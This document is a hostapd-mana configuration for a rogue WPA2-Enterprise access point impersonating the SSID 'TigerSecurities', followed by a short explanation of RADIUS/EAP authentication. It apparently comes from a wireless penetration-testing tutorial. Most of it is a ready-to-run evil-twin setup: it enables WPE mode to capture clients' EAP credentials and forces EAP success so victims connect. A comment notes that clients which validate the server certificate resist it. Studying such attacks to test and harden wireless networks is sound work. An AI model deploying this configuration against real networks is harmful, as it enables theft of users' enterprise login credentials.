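# ------------------------------
# common hostapd configuration
# ------------------------------
# NOTE: hostapd treats only lines that begin with '#' as comments. Text that
# follows a value on the same line is read as part of the value, so every
# comment below sits on its own line above the key it describes.
interface=wlan1
ssid=TigerSecurities
channel=6
hw_mode=g
# --------------------
# WPA configuration
# --------------------
# use WPA2 version
wpa=2
# use external authentication server
wpa_key_mgmt=WPA-EAP
# pairwise encryption to use (TKIP is deprecated; CCMP is the WPA2 cipher)
wpa_pairwise=TKIP CCMP
# --------------------------
# EAP server configuration
# --------------------------
# requires 802.1x authentication server
ieee8021x=1
# EAPOL key index fix for WinXP supplicant (disabled here)
eapol_key_index_workaround=0
# enable integrated EAP server instead of RADIUS
eap_server=1
# filename containing information of users
eap_user_file=fakenet.eap_user
# -------------------------------------------------
# certificate configuration for EAP-TLS/PEAP/TTLS
# -------------------------------------------------
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
# private key for the server certificate
private_key=/root/certs/server.key
# password used to encrypt the private key (empty here)
private_key_passwd=
# file path to DH/DSA parameters file (in PEM format)
dh_file=/root/certs/dhparam.pem
# -----------------------------
# mana specific configuration
# -----------------------------
# Defensive context: a supplicant that validates the server certificate
# against its configured CA and expected server name aborts the TLS tunnel
# before sending inner credentials, so the two settings below only affect
# clients that skip or mis-configure that validation.
# enable WPE mode to intercept various EAP credentials
mana_wpe=1
# return EAP success to the clients, and have them connect
mana_eapsuccess=1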
Authentication is done using a Remote Authentication Dial-In User Service (RADIUS) server. The client authenticates by exchanging a number of EAP frames, depending on the agreed-upon authentication scheme, which the AP relays to the RADIUS server. If authentication is successful, the result is then used as the Pairwise Master Key (PMK) for the 4-way handshake, as opposed to PSK, where the PMK is derived from the passphrase.